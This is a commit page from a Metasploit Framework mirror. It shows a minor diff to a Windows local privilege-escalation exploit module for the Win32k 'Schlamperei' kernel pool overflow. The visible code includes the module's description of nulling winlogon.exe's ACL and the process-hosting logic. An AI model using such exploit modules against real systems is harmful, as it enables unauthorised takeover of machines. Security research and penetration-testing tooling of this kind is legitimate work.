infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3 from Meatballs1/pr3090 

Pr3090
bug/bundler_fix
kyuz0 2014-05-02 14:20:00 +01:00
parent d9ad78e3c8 56c5eac823
commit faaf0787a5
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/exploits/windows/local/ms13_053_schlamperei.rb
View File

@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Local
include Msf::Post::Windows::Process include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={}) def initialize(info={})
super(update_info(info, { super(update_info(info, {
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
'Description' => %q{ 'Description' => %q{
A kernel pool overflow in Win32k which allows local privilege escalation. A kernel pool overflow in Win32k which allows local privilege escalation.
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
This allows any unprivileged process to freely migrate to winlogon.exe, achieving This allows any unprivileged process to freely migrate to winlogon.exe, achieving
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Local
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.") print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Trying to elevate the current process...") print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open process = client.sys.process.open
end end